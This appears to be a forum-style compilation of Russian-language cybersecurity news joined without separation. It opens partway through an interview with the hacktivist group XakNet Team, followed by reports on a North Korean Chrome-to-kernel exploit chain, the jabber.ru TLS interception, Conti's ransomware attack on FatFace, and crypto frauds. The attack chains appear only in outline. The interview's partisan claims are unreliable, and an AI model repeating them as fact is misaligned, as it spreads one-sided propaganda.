Russian OSINT : Иногда можно увидеть как западные блогеры или обычные пользователи социальных сетей не из России, преимущественно англоговорящие, публично призывают совершать DDoS-атаки Россию или даже взламывать критическую инфраструктуру. Почему по вашему мнению Западные правоохранительные органы не реагируют должным образом на все эти киберпреступления? Понесут ли ответственность за все эти деяния недоброжелатели?
XakNet Team : Я уже выше отвечал, потому что беспредел. Отвечать никто ни за что не будет. Политика "двойных стандартов" запада - на лицо. Россию ломать можно, их - нет.
Russian OSINT : Не пугает ли Вас то, что вряд ли вы сможете выехать за пределы СНГ по понятным причинам?
XakNet Team : Нет, не пугает. У нас огромная страна. Путешествовать можно и тут. Все, что хотел посмотреть - посмотрел до начала СВО, поэтому ничего не потеряю) Мне нравится Сочи, Крым) Того и глядишь, в Одессу можно будет ездить. Я кстати с удовольствием приобрету там домик, если они примут решение вступить в состав РФ)
Russian OSINT : Можно ли утверждать, что в скором времени профессия специалиста по информационной безопасности в сложившихся реалиях станет одной из самых востребованных на постсоветском пространстве?
XakNet Team : На самом деле, кадровая голодовка в компаниях - на лицо. Постоянный хантинг сотрудников, огромные зарплаты. Раньше в СНГ бытовало мнение, что разработка - приносит деньги, а ИБ - их отнимает. Сейчас политика поменялась, и пришло осознание, что разработка действительно приносит деньги, а ИБ - их сохраняет. Это важно, теперь куда проще объяснить зачем тебе нужно то или иное оборудование, а благодаря СМИ наши предприниматели понимают, какой ущерб может нанести атака.
Russian OSINT: Рано или поздно горячая фаза спецоперации закончится. Что вы будете делать после ее окончания?
XakNet Team : Тоже, что до нее и вовремя - работать) После СВО будем подтягивать именно защиту Российских компаний. Мы занимаемся этим давно, и увы
Russian OSINT : Есть ли у вас мечта?
XakNet Team : Какой-то материальной - уже нет. Хочется что бы дети росли здоровыми, родители долго жили. Все остальное - ерунда)
Russian OSIN T: Украинцы и Русские снова будут жить в мире согласии через некоторое время?
XakNet Team : А кто сказал, что мы живем не в мире и согласии? Я ведь не из СМИ узнал о фашистах) У меня очень много друзей из Одессы. Дословная цитата: Единственная претензия к Россиянам в том, что это началось только сейчас. Мы были готовы к референдуму еще в 2014. Причем это вот не конкретно мои друзья говорят (к слову, Украинцы по национальности, а не Русские. Просто русскоязычные). Они и скрины кидали из чатов местных.
Russian OSINT : С учётом сложившейся обстановки, на какие ИБ-сертификаты при трудоустройстве вы бы посоветовали обратить свое внимание тем, кто только начинает свой путь в информационной безопасности?
XakNet Team : Мы бы рекомендовали обратить внимание на такие сертификаты, как: CISSP, OSCP, OSEP. К сожалению, в РФ это направление еще не так развито, и каких-то наших "импортозаместителей" еще нет.
Russian OSINT : Для того чтобы стать универсальным специалистом в IT-сфере с навыками программирования, какие языки стоит изучать в первую очередь?
XakNet Team : В первую очередь это Питон. Прост для обучения, универсален. Решает кучу задач. Также будет не лишним С#.
Russian OSINT : Какие белые ИБ-специализации будут сейчас самыми востребованными в ближайшее время?
XakNet Team : В первую очередь нужны будут грамотные пентестеры, чтобы в целом понять уровень безопасности. Следом будут эксперты по настройки и обслуживанию СЗИ. Ну это в идеальном мире, как там на деле сработают менеджеры по продажам и что продадут - загадка)
Russian OSINT : Ваш финальный совет тем, кто только начинает изучать информационную безопасность.
XakNet Team : Совет простой. Сейчас на волне популярности профессии, мамы и папы толкают в IT сферу своих детей. Делается это из-за денег, которые там можно заработать. Но вот все как-то забывают, что все те, кто в этой сфере сейчас - начинали не ради денег. Мы все были детьми, которым это было интересно, именно поэтому достигли успеха в этом направлении. Если душа лежит к этой профессии - добро пожаловать.
Если вы просто хотите "заработать денег сидя за компьютером" - забейте, ничего не выйдет. Ну и еще, ремарочка для родителей. К моменту поступления в институт, ваш ребенок уже либо что-то пишет, либо что-то ломает, если у него к этому лежит душа. Когда видите, что он где-то там бегает в компьютере с мечом и кого-то убивает, то это не программист/ибэшник, а обычный задрот, прости Господи.
а обычный задрот, прости Господи.
Согласно исследованиям «Лаборатории Касперского», Российская Федерация на данный момент лидирует в мировом рейтинге по общему количеству инцидентов информационной безопасности.
У среднего российского пользователя риск стать жертвой киберпреступников и интернет-мошенников на данный момент находится на уровне 73-75%.
До коронавирусной пандемии показатель этого риска находился на уровне примерно 30-35%, но в течение последних 3-4 лет фиксируется существенный рост.
РФ выступает в качестве наиболее атакуемой хакерами страны в мире, т.к. атаки проводятся не только со стороны финансово мотивированных киберпреступников, но и со стороны политически мотивированных хактивистов, организующих крупномасштабные DDoS-атаки, нацеленные на различные российские организации и предприятия из разных отраслей.
Сотрудники МВД России подключены к цифровому сервису "Личный кабинет правоохранительного органа", благодаря которому уже есть положительный опыт в выявлении недобросовестных владельцев криптокошельков. Об этом в интервью ТАСС в преддверии Международного дня борьбы с коррупцией, который отмечается 9 декабря, сообщил начальник ГУЭБиПК МВД РФ генерал-лейтенант полиции Андрей Курносенко.
"Данный цифровой проект ("Личный кабинет правоохранительного органа" - прим. ТАСС) уже внедрен и успешно функционирует", - сказал он.
Курносенко отметил, что этот сервис обладает аналитическим модулем, позволяющим не только оперативно получать и оценивать информацию о финансовых рисках экономики по всей стране, но и показывает результаты совместной работы в разрезе нацпроектов, по линиям работы в сфере лесопромышленного комплекса, ЖКХ, оборонной промышленности, киберпреступности и иных направлений деятельности.
Кроме того, по его словам, в систему интегрирован модуль мониторинга криптовалютных транзакций. "Уже имеется положительный опыт использования данного инструмента по выявлению недобросовестных владельцев криптокошельков",
source: tass.ru/obschestvo/16542005
Компания Microsoft [сообщила](https://www.microsoft.com/en- us/security/blog/2024/08/30/north-korean-threat-actor-citrine-sleet- exploiting-chromium-zero-day/), что северокорейские хакеры использовали недавно исправленную уязвимость нулевого дня в Google Chrome (CVE-2024-7971) для развертывания руткита FudModule. Малварь применялась после получения привилегий уровня SYSTEM с помощью эксплоита для бага в ядре Windows.
«С высокой степенью уверенности мы считаем, что за наблюдаемой эксплуатацией CVE-2024-7971 могут стоять северокорейские злоумышленники, нацеленные на криптовалютный сектор с целью получения финансовой выгоды», — заявила Microsoft, приписав атаки группировке Citrine Sleet (ранее DEV-0139, или AppleJeus, Labyrinth Chollima и UNC4736 по классификации других компаний).
Click to expand...
Обычно группировка Citrine Sleet атакует финансовые учреждения (в основном криптовалютные организации) и связанных с ними лиц. К примеру, в марте 2023 года хакеры заразили трояном десктопный клиент 3CXDesktopApp компании 3CX и использовали его для распространения вредоносного ПО среди клиентов компании. Причем эта атака на цепочку поставок произошла из-за другой атаки на цепочку поставок: сначала злоумышленники взломали компанию Trading Technologies, занимающуюся автоматизацией биржевой торговли, и распространили троянизированные версии ее ПО.
Свежая уязвимость CVE-2024-7971 в Chrome, об эксплуатации которой теперь предупредила Microsoft, была устранена в середине августа 2024 года. Тогда сообщалось, что проблема обнаружена в JavaScript-движке V8, ее нашли специалисты Microsoft Threat Intelligence Center (MSTIC) и Microsoft Security Response Center (MSRC), и она относится к типу type confusion.
Как сообщается теперь, жертвы попадали на контролируемый злоумышленниками сайт voyagorclub[.]space, и уязвимость позволяла хакерам добиться удаленного выполнения кода в процессе рендеринга в песочнице Chromium-браузеров.
После побега из песочницы хакеры использовали скомпрометированный браузер для загрузки эксплоита уязвимости CVE-2024-38106 в ядре Windows (исправлена в рамках августовского «вторника обновлений»), что позволило получить привилегии уровня SYSTEM.
Также исследователи рассказывают, что хакеры загружали в память пострадавшего устройства руткит FudModule, который использовался для вмешательства в ядро и прямого манипулирования объектами ядра, позволяя обходить защитные механизмы.
Впервые этот вредонос был обнаружен еще в октябре 2022 года, и ранее он применялся северокорейской группировкой Diamond Sleet, с которой Citrine Sleet имеет общие вредоносные инструменты и инфраструктуру.
«13 августа Microsoft выпустила обновление безопасности для устранения уязвимости нулевого дня в драйвере AFD.sys в Windows (CVE-2024-38193), выявленной Gen Threat Labs, — сообщают специалисты Microsoft. — В начале июня Gen Threat Labs обнаружила, что Diamond Sleet эксплуатирует эту уязвимость в атаках с использованием руткита FudModule, который предоставляет полный user-to-kernel доступ».
Click to expand...
Также в отчете Microsoft отмечается, что одна из организаций, атакованная при помощи уязвимости CVE-2024-7971, ранее уже была атакована другой северокорейской хак-групой — BlueNoroff (она де Sapphire Sleet).
Администратор Jabber-сервера jabber.ru (xmpp.ru) выявил атаку по расшифровке трафика пользователей (MITM), проводимую на протяжении от 90 дней до 6 месяцев в сетях немецких хостинг-провайдеров Hetzner и Linode, в которых размещён сервер проекта и вспомогательные VPS-окружения. Атака организована через перенаправление трафика на транзитный узел, подменяющий TLS-сертификат для XMPP-соединений, шифруемых с использование расширения STARTTLS.
Атака была замечена из-за ошибки её организаторов, которые не успели продлить TLS-сертификат, используемый для подмены. 16 октября администратор jabber.ru при попытке подключения к сервису получил сообщение об ошибке из-за истечения срока действия сертификата, но размещённый на сервере сертификат не был просрочен. В итоге выяснилось, что получаемый клиентом сертификат отличается от сертификата, отправляемого сервером. Первый поддельный TLS-сертификат был получен 18 апреля 2023 года через сервис Let’s Encrypt, в котором атакующий, имея возможность перехватить трафик, смог подтвердить доступ к сайтам jabber.ru и xmpp.ru.
Вначале возникло предположение о компрометации сервера проекта и выполнении подмены на его стороне. Но проведённый аудит не выявил никаких следов взлома. При этом в логе на сервере было замечено кратковременное выключение и включение сетевого интерфейса (NIC Link is Down/NIC Link is Up), которое было произведено 18 июля в 12:58 и могло свидетельствовать о манипуляциях с подключением сервера к коммутатору. Примечательно, что два поддельных TLS- сертификата были сгенерированы за несколько минут до этого - 18 июля в 12:49 и 12:38.
Кроме того, подмена производилась не только в сети провайдера Hetzner, в котором размещён основной сервер, но и в сети провайдера Linode, в котором размещались VPS-окружения со вспомогательными прокси, перенаправляющими трафик с других адресов. Косвенным путём было выяснено, что трафик на 5222 сетевой порт (XMPP STARTTLS) в сетях обоих провайдеров перенаправляется через дополнительный хост, что дало основание полагать, что атака произведена лицом, имеющим доступ к инфраструктуре провайдеров.
Теоретически подмена могла производиться с 18 апреля (дата создания первого поддельного сертификата для jabber.ru), но подтверждённые случаи подмены сертификата зафиксированы только с 21 июля по 19 октября, всё это время шифрованный обмен данными с jabber.ru и xmpp.ru можно считать скомпрометированным. Подмена прекратилась после начала разбирательства, проведения тестов и направления 18 октября запроса в службу поддержки провайдеров Hetzner и Linode. При этом дополнительный переход при маршрутизации пакетов, отправляемых на 5222 порт одного из серверов в Linode, наблюдается и ныне, но сертификат теперь не подменяется.
Предполагается, что атака могла быть совершена с ведома провайдеров по требованию правоохранительных органов, в результате взлома инфраструктур обоих провайдеров или сотрудником, имевшим доступ к обоим провайдерам. Имея возможность перехвата и модификации XMPP-трафика, атакующий мог получить доступ ко всем связанным с учётными записями данным, таким как хранимая на сервере история обмена сообщениями, а также мог отправлять сообщения от чужого имени и вносить изменения в чужие сообщения. Сообщения, отправленные с использованием сквозного шифрования (OMEMO, OTR или PGP), можно считать не скомпрометированными, если ключи шифрования подтверждены пользователями на обеих сторонах соединения. Пользователям jabber.ru рекомендуется сменить пароли доступа и проверить ключи OMEMO и PGP в своих PEP-хранилищах на предмет возможной подмены.
British clothing brand FatFace has sent a controversial 'confidential' data breach notification to customers after suffering a ransomware attack earlier this year.
This week, customers began receiving data breach notifications revealing that the popular lifestyle clothing brand, FatFace, had suffered a data breach after a cyberattack on January 17th, 2021.
Data breach at @FatFace. It feels a bit... misleading:
“Our systems are fully secure and FatFace remains a safe place to shop online or in person” - except for the data breach they just had! pic.twitter.com/3SjHmwwh7P
— Troy Hunt (@troyhunt) March 23, 2021Click to expand...
According to the notification, threat actors gained access to FatFace's
network and systems and accessed customer data. This data customers' names,
email addresses, mailing addresses, and partial credit card information (last
four digits and expiration date).
What was controversial about the data breach notification is that it told
recipients to "Please do keep this email and the information included within
it strictly private and confidential."
BleepingComputer has covered many data breaches. We have never seen a company asking a user to keep a data breach confidential and likely has no power to make that request.
As you can imagine, this single sentence led to quite an uproar on Twitter, with users baffled that the notification would include that type of language.
Oh, and the subject of the disclosure email was “Strictly private and confidential - Notice of security incident” - why? It contained no PII other than the recipient’s address, why is a notice of a breach “strictly private and confidential”? That’s really odd.
— Troy Hunt (@troyhunt) March 23, 2021Click to expand...
It's a bit rich that @FatFace wait two months to inform their "valued customers" of a serious data breach and tell us to keep the email and information included in it strictly private and confidential!
— Moira M (@reiver_rover) March 24, 2021Click to expand...
@fatface have emailed me to say they have been hacked and my details have been compromised TWO months after it happened and asked me to keep it confidential. Wtf #fatface #gdpr
— Pat Golding (@goldingp) March 24, 2021Click to expand...
While many felt that FatFace was trying to keep the data breach under wraps, it turns out there was much more to the story.
According to Computer Weekly, the data breach was caused by a Conti ransomware attack in January 2021.
A ransom note found by Valéry Marchive of ComputerWeekly's sister-publication LeMargIT allowed the publication to review a ransom negotiation between FatFace and the ransomware gang.
As is common in today's ransomware attacks, the threat actors reviewed the victim's financial data before deploying the ransomware. This review provided insight into the company's finances, including FatFace's cyber insurance coverage, which the threat actors brought up during the negotiations.
While Conti originally asked for $8.5 million, the negotiations ultimately led
to a payment of $2 million to gain access to a decryption key and a promise
not to leak the 200GB of stolen data.
The threat actors stated that they gained access to an internal FatFace
workstation via a phishing attack on January 10th, 2021, where they then
spread laterally through the network.
"From there, the team was able to obtain general administrative rights and began to move laterally through the network, identifying the retailer’s cyber security installations, Veeam backup servers and Nimble storage. The ransomware attack itself was executed on 17 January and saw more than 200GB of data exfiltrated," Computerweekly [reported](https://www.computerweekly.com/news/252498463/Retailer-FatFace- pays-2m-ransom-to-Conti-cyber-criminals).
The Conti gang also provided the victim with a report on how to better protect their network, including email filtering, phishing awareness tests, better Active Directory password policies, EDR technology, and an offline backup strategy.
When contacted by ComputerWeekly, FatFace confirmed the ransomware attack and said they reported it to law enforcement and the Information Commissioner’s Office (ICO).
“FatFace was unfortunately subject to a ransomware attack which caused significant damage to our infrastructure." -FatFace.
Click to expand...
Основатели южноафриканской инвестиционной компании Africrypt, исчезли вместе с 69 000 BTC, доверенных им инвесторами. Братья Раис и Амир Кейджи по предварительной информации, бежали в Великобританию, закрыв сайт, перестав выходить на связь в соцсетях и по телефону.
Инвесторы Africrypt потеряли доступ к своим счетам еще в апреле этого года, Амир Кейджи объяснил эту проблему хакерской атакой, пообещав компенсировать клиентам все ее потери.
В реальности братья занялись активной деятельностью по выводу средств. Как показало расследование адвокатской конторы Hanekom Attorneys, нанятой рядом крупных инвесторов, Africrypt уже в апреле проводила активно обналичивала принадлежащие клиентам BTC с апреля месяца.
Братья Кейджи могли выйти из Bitcoin на максимумах рынка до начала падения курса криптовалюты. В этом случае потери клиентов составили $4 млрд, приблизившись к рекордсмену скама – криптопирамиде OneCoin.
Более точную цифру потерь и пути вывода средств адвокатам Hanekom Attorneys пока сложно установить. Мошенники перевели все BTC на 4 кошелька из которых разбрасывали их через миксеры, использовали прокрутки депозитов с помощью обернутого Bitcoin, а также промежуточные обмены с привлечением анонимных криптовалют.
Africrypt имела достаточно времени для вывода и отмывания средств, благодаря тому, что криптовалюты в ЮАР не имеют четкого законодательного регулирования. Обманутые клиенты могли только надеяться на административное дело в суде по банкротству компании. Пока адвокаты пытались направить иски, братья уже завершили переводы и покинули ЮАР.
Несмотря на очевидность аферы и добытую адвокатами доказательную базу, финансовый регулятор ЮАР так и не приступил к расследованию инцидента. Местная полиция пока только изучает обстоятельства этого дела.
25-26 июня в онлайн-режиме прошел финал международных соревнований по этичному хакингу CTFZone 2021. В рамках тренинга прошла крупнейшая в истории attack- defence битва, в которой участвовали 334 команды из 61 страны мира. Мероприятие проводит компания по стратегическому управлению цифровыми рисками BI.ZONE с 2016 года.
CTF (Capture the Flag) — соревнования, на которых оценивается умение участников решать прикладные задачи в области кибербезопасности: защищать и атаковать компьютерные системы, находить и исправлять уязвимости в сервисах. Ключевое отличие CTFZone 2021 от турниров прошлых лет — это новый гибридный формат: задания были представлены в форматах jeopardy, attack, defence и security game.
Большинство CTF-соревнований устроены так:
• в отборочном этапе сотни команд удаленно решают задачи из различных категорий в формате jeopardy;
• в финале 10 сильнейших команд встречаются очно/онлайн в формате attack- defence.
В CTFZone 2021 команды на протяжении 13 часов 37 минут одновременно участвовали в трех форматах:
• jeopardy, где были предложены 14 заданий из различных категорий, от профессионального программирования до компьютерной криминалистики;
• attack-defence, где каждой команде были предоставлены 3 сервиса, и для получения победных очков необходимо было атаковать сервисы противников, одновременно защищая собственные ресурсы;
• security game, задание формата «царь горы», ставшее отличительной чертой CTFZone — здесь команды в реальном времени следили, как написанные ими алгоритмы атакуют друг друга и какой из них оказывается эффективнее.
«Удаленный режим и масштабность attack-defence в этом году предъявили высочайшие требования к качеству подготовки инфраструктуры. Она должна была не только безупречно работать из любой точки мира, но и выдержать нагрузку, в 100 раз превышающую нагрузку прошлых лет. Для проведения CTFZone в этот раз были задействованы вычислительные мощности в 10 000 ядер. Настройкой и поддержкой нестандартной инфраструктуры для соревнований занимались специалисты BI.ZONE», — рассказал Евгений Волошин, директор блока экспертных сервисов BI.ZONE.
Во время турнира была организована круглосуточная поддержка пользователей: команда BI.ZONE оперативно отвечала в специальном онлайн-чате, а также следила за работоспособностью систем. Несмотря на повышенную нагрузку на сеть, участники отметили высокое качество работы всех компонентов инфраструктуры и бесперебойную работу сервисов.
По результатам соревнований призовой фонд в $18 000 разделили следующие команды:
• 1 место — «Bushwhackers», Россия ($10 000);
• 2 место — «More Smoked Leat Chicken», Россия ($5 000);
• 3 место — «httpizza», Италия ($3 000).
В прошлом году в результате 24-часовой борьбы призовой фонд в $18 000 разделили команды из России и Китая, которые заняли первые три места. Российская команда, которая заняла первое место, также получила право принять участие в финале DEF CON CTF — крупнейшего международного CTF-турнира, который проходит уже более 30 лет в Лас-Вегасе.
Джесси Кипф надеялся, что от ФБР его спасет COVID-19.
В октябре был арестован хакер Джесси Кипф, обвиняемый в нарушении кибербезопасности нескольких коммерческих компаний и систем здравоохранения США. По данным исследователей, Кипф подделал свидетельство о своей смерти, чтобы избежать наказания.
Изначально Кипф взломал сети компаний Guest-Tek Interactive Entertainment и Milestone Inc., которые предоставляют интернет-услуги для гостей сети отелей Marriott. Это произошло 12 февраля и 21 июня соответственно, как сообщает Прокуратура Восточного округа Кентукки.
Согласно отчетам полиции, Кипф продавал личные данные клиентов Marriott на российском форуме. Обвинение включает в себя кражу личных данных, интернет- мошенничество и взлом крупных организаций, в том числе государственных.
Кипфа отследили по его личному IP-адресу, который он использовал для доступа к системе регистрации смертей департамента здравоохранения Гавайев в январе 2023 года. Это один из ресурсов, в которых мужчина, по всей видимости, планировал зафиксировать свою гибель: были также взломаны госучреждения Коннектикута, Вермонта, Аризоны, Теннеси и других штатов.
Официальные лица Вермонта сообщили ФБР, что в мае в их системах было зарегистрировано свидетельство о смерти на имя Кипфа. Однако представитель департамента здравоохранения штата уверяет журналистов, что никакие данные при этом не были украдены.
В качестве причины смерти в поддельном свидетельстве мужчина указал COVID-19. Доступ к взломанным ресурсам он впоследствии решил продать.
Сам Кипф утверждает, что всего лишь тестировал государственные сервера на предмет уязвимостей – все, за исключением гавайских.
source:
justice[.]gov/d9/2023-11/Kipf%20Indictment.pdf
justice[.]gov/usao-edky/case/united-states-v-jesse-e-kipf
В поисках «русских» дел по судам нашей новой необъятной родины я наткнулся на чисто американское дело, суть которого считаю необходимым сообщить как знамение нового времени.
Как известно, выбранный на минувших выборах и пока не утвержденный 46-м президентом США бывший вице-президент Джозеф Байден одним из приоритетов своей программы назвал борьбу за чистый воздух, который при его власти перестанет засорять углекислый газ, искусственно выделяемый при сжигании нефтепродуктов или естественно животными, желудки которых перерабатывают пищу. Программа демократа Байдена заменит уголь и нефть энергией солнца и ветра, и вконец измученный республиканцами народ вздохнет полной грудью чистый воздух демократов. Этот переход будет нелегким, о чем свидетельствует сообщение федеральной прокуратуры Восточного округа Калифорнии в Сакраменто, где в середине ноября арестовали Рэймонда Брюера из городка Портервилл.
64-летнего Брюера, владельца компании CH4 Power, обвиняют в «электронном» мошенничестве, похищении личных данных и отмывании денег, в результате чего инвесторы его компании, которой больше нет, потеряли минимум 8,750,000 долларов. В обвинении уточняется, что с марта 2014 года Брюер предлагал инвесторам вложить деньги во внедрение бескислородных реакторов (anaerobic digesters) на молочных фермах Калифорнии и Айдахо. Инвесторам сообщалось, что реакторы Брюера будут перерабатывать навоз в природный газ метан (химическая формула СН4), который можно с выгодой продавать. В действительности никаких биореакторов не было, а полученные деньги Рэймонд тратил на личные потребности, включая новые автомобили и недвижимость в Калифорнии и Монтане. Обвинение грозит ему лишением свободы сроком до 20 лет и штрафом до 250 тыс. долларов, но до решения суда он считается невиновным.
Это было на востоке Калифорнии, а в федеральном суде Центрального округа этого штата в Лос-Анджелесе судья Джордж Ву приговорил к 84 месяцам, то есть 7 годам лишения свободы, 43-летнего выходца из советской Армении Микаэла Хмакаяна, он же «Марко Реус», проживающего в Глендейле – пригороде Лос-Анджелеса, где находится одна из крупнейших в Соединенных Штатах общин выходцев из Армении. Их там 54 тысячи, то есть 40% населения Глендейла. Судья также обязал Хмакаяна заплатить 4,906,534 доллара в счет компенсации нанесенного ущерба. Предъявленное обвинение грозило Хмакаяну тюрьмой на срок до 62 лет. Его арестовали в ноябре 2018 года, освободили под залог в четверть миллиона долларов, и 29 июня этого года Хмакаян признал себя виновным в банковском мошенничестве и похищении личных данных с помощью «игры на вылет» (bust out). Так называют аферу, когда мошенник получает кредитную карту (часто по похищенным данным другого лица) и «грузит» ее до разрешенного максимума без намерения когда-либо расплатиться с выдавшим карту банком.
Кредитные карты иногда получались на реальные имена участников аферы, но чаще на так называемые «синтетические данные» – комбинацию правды и вымысла, например, фамилия и дата рождения придуманные, а номер карточки социального страхования реального лица. В данном случае два десятка банков потеряли почти 5 млн долларов, а на выданные ими кредитные карты мошенники во главе с Микаэлом Хмакаяном приобретали и перепродавали с наживой спиртные напитки, дорогие автомобили и могильные участки на кладбище. На 27 страницах обвинения перечислены 37 эпизодов «игры на вылет». Признав себя виновным, Хмаякян подтвердил судье Джорджу Ву, что в одной такой «игре» он с сообщниками с ноября 2014 по сентябрь 2015 года приобретал на незаконно открытые кредитные карты спиртные напитки и часы на общую сумму в сотни тысяч долларов.
Вместе с Хмакаяном по делу шли 70-летняя Гаяне Хакобян из Голливуд-Хиллс, 45-летний Ваган Алоян из Глендейла и 38-летний Микаэл Ховханисян из Норт- Голливуда. Хакобян в июне этого года признала себя виновной, подтвердила, что участвовала в преступном сговоре, позволяя другим открывать кредитные карты на ее имя, и 8 октября судья Ву приговорил ее двум годам испытательного срока и выплате 223,235 долларов. Ховханисян признал себя виновным в июне 2019 года, отсидел 9 месяцев в федеральной тюрьме бесконвойного содержания в калифорнийском городе Лонг-Бич на берегу океана и вышел на свободу 1 октября с обязательством заплатить 412,413 долларов. Ваган Алоян виновным себя не признает, и суд присяжных над ним назначен на 15 марта 2021 года.
Как установило расследование, спиртные напитки (в основном дешевое вино) Хмакаян и Ховханисян покупали в Глендейле в магазине Liquor Spot с ведома менеджера Вагана Алояна и получали его на оптовой базе Southern Wine and Spirits (SWS) в Лос-Анджелесе. В 2016 году в магазине Алояна был проведен обыск, в результате которого изъяли больше 37 тыс. бутылок вина общей стоимостью примерно 300 тыс. долларов и 13 тыс. долларов наличными, а при обыске дома Вагана Алояна нашли 37 часов и ювелирные изделия. Часы и ювелирные изделия «игроки на вылет» покупали в магазине Bhindi Jewellers, тоже в Лос- Анджелесе. 18 августа 2015 года Ховханисян по кредитной карте Bank of America на свое имя, но с поддельными другими данными, купил в Bhindi Jewellers часы Rolex в количестве четырех штук за 28500 долларов. Через два дня он, уже на карту банка Capital One, купил в Liquor Spot спиртное на 34001 доллар, и в тот же день менежер Ваган Алоян подписал эту покупку для ее получения на базе. 26 августа 2015 года Ховханисян по той же карте Capital One купил у Bhindi Jewellers за 26737 долларов часы Rolex в количестве трех штук.
4 сентября 2015 года Микаэл Хмакаян по кредитной карте Citibank на имя «Марко Реус» купил в Liquor Spot и получил на базе SWS вино на сумму 9500 долларов, и в тот же день на ту же кредитную карту там же было куплено спиртное на сумму 25 тыс. долларов. Признав вину, Хмакаян также подтвердил, что с апреля 2010 по апрель 2016 года под вымышленными именами получал кредиты на приобретение дешевых корейских автомобилей Kia Optima, а от имени реально существующих лиц покупал на кредитные карты дорогие машины, включая японские Lexus. В признании он отметил, что не собирался платить ни по кредитам, ни по кредитным картам. С марта 2014 по январь 2017 года Хмаякян покупал участки на кладбище Forest Lawn в Глендейле, расплачиваясь кредитными картами на различные имена, включая «Лиам Саркоззи» и «Марко Реус». Купленные участки он с выгодой перепродавал, и, в общем, его плодотворная незаконная активность в аферах «игра на вылет» нанесла банкам кредитных карт ущерб в 5,232,383 доллара. Пострадавшими в обвинении были указаны банки от Bank of America и Chase до Capital One и Citibank.
В том же федеральном суде Центрального округа Калифорнии 18 ноября предъявили обвинения двум супружеским парам из лос-анджелесского пригорода Энсино в долине Сан-Фернандо. 42-летний Ричард Айвазян и его 36-летняя жена Мариетта Терабелян, а также брат Ричарда, 40-летний Артур Айвазян и его 39-летняя супруга Тамара Дадян обвиняются в «афере ХХI века», то есть мошенничестве с банками с использованием электронных средств связи, а также краже личных данных. Все это, заметьте, при отягчающих обстоятельствах, за что супругам грозит до 30 лет лишения свободы, но можно быть уверенным, что у них хватит благоразумия признать вину на приемлемых условиях.
Ричарда Айвазяна с женой Мариеттой арестовали 20 октября в Майами, когда они возвращались домой после отдыха на карибских островах Тёркс и Кайкос, а его брата Артура с женой Тамарой арестовали 5 ноября в их доме. Обе супружеские пары были освобождены под залог и до решения суда считаются невиновными. Все четверо обвиняются в обмане принятого в связи с пандемией закона CARES, аббревиатура которого означает заботу, а расшифровывается, как Coronavirus Aid, Relief and Economic Security – «Помощь, содействие и экономическая безопасность при коронавирусе». Вступивший силу в марте, этот закон предусматривал оказание чрезвычайной финансовой помощи миллионам американцев, куда входила помощь мелким бизнесам через Small Business Administration (SBA), помощь пострадавшим от стихийного бедствия (Economic Injury Disaster Relief Program или EIDL) и программа защиты заработной платы (Paycheck Protection Program или PPP).
По этой программе мы получили по чеку на 1200 долларов с подписью Дональда Трампа, что его противников озлобило еще пуще. «За полгода до президентских выборов, в условиях поставленной на паузу из-за вируса кампании, от которой его сторонники ждут шумных ралли, чеки послужат Трампу новой формой низовой политики. Чек – это осязаемый, материальный символ, который приходит к налогоплательщикам прямо в почтовый ящик», – написала тогда газета The Washington Post. Пострадавшим от коронавируса малым и средним бизнесам предоставлялись льготные займы под 2,5-4% в год, причем в первый год проценты по ним можно не выплачивать. На это в марте было выделено 349 млрд долларов, а в апреле еще 300 млрд. Но если заявитель получал заем по программе PPP, ему не полагалась помощь по EIDL.
Обвиненные в нарушении этого закона супруги Айвазян-Терабелян и Айвазян-Дадян, как утверждает прокуратура, «пользовались ложными, крадеными или синтетическими (то есть комбинированными) данными на имена «Юлия Жадко» и «Виктория Каичко» для подачи заявлений на займы, гарантированные SBA по программе EIDL, и программой PPP по закону CARES». Подсудимые также подавали заявления от себя лично, называя ложные или вымышленные бизнесы, а в доказательство часто приводя ложные документы, налоговые данные и ведомости зарплаты. Полученные по этим программам минимум 4,6 млн долларов они предположительно тратили не на поддержку бизнесов, а на себя, в частности, сделав первый взнос на покупку за 3,25 млн долларов дома в лос-анджелесском районе Тарзана и дома за 1 млн долларов в Глендейле. В пресс-релизе по этому делу федеральная прокуратура Центрального округа штата Калифорния просит всех, кому известно о подобных аферах, сообщать в Национальный центр борьбы с мошенничеством этого рода (Department of Justice’s National Center for Disaster Fraud) по «горячей», то есть круглосуточной телефонной линии 866-720-5721 или по Интернету Web Complaint Form.
Японская криптобиржа DMM Bitcoin предупреждает, что в пятницу с одного из ее кошельков было украдено 4502,9 биткоина (BTC), или приблизительно 308 миллионов долларов (48,2 миллиарда иен), что делает это крупнейшее ограбление криптовалюты в 2024 году.
"Примерно в 13:26 в пятницу, 31 мая 2024 года, мы обнаружили несанкционированную утечку биткоина (BTC) из нашего кошелька", - сообщили клиентам DMM Bitcoin.
Аналитическая компания Elliptic, занимающаяся поиском украденных биткоинов, сообщает, что злоумышленники уже распределили украденные биткоины по нескольким новым кошелькам.
Эллиптик говорит, что если подтвердится, что это кража, то это будет восьмое по величине крипто-ограбление за все время и самое крупное в этом году.
Пока компания расследует кражу, она ограничила использование многочисленных сервисов на своей платформе, включая регистрацию новых учетных записей, вывод криптовалюты, покупки на спотовых торгах и новые открытые позиции для торговли с использованием кредитного плеча.
DMM Bitcoin не предоставила никакой информации о том, как произошла кража, но подобные кражи совершались в прошлом путем получения доступа к корпоративным системам или использования недостатков в смарт-контрактах или веб-сайтах.
Киберполиция разоблачила хакера, который с помощью вредоносного ПО похищал персональные данные жителей Канады и США, а затем продавал лицам, заинтересованным в присвоении сбережений жертв. С заказчиками злоумышленник контактировал по российскому номеру телефона. Оплату получал в биткоинах и выводил средства на свою банковскую карту и карточку жены.
31-летний житель Винницкой области создал вредоносное программное обеспечение для угона персональных данных из операционной системы Android. Получившуюся конфиденциальную информацию злоумышленник в дальнейшем использовал для взлома аккаунтов сервисов Google, сообщает Киберполиция.
Для распространения вируса хакер создал и администрировал несколько сайтов, где предлагал пользователям бесплатно скачать разнообразное программное обеспечение. Фигурант развернул в интернете целую рекламную кампанию для продвижения подконтрольных веб-ресурсов.
После установки модифицированных мужчиной программ, компьютеры жертв инфицировались вредоносным программным кодом. Таким образом злоумышленник получал доступ к банковским счетам, системам онлайн-банкинга и другим персональным данным.
Известно, что к своей деятельности винничанин привлек сообщников из даркнета, личности которых устанавливаются.
14 февраля правоохранители при силовой поддержке спецназовцев «КОРД» ГУНП в Винницкой области провели 3 обыска, в результате которых, среди прочего, изъят автомобиль марки Mercedes-Benz GLE, рыночная стоимость которого составляет примерно 2,5 млн грн.
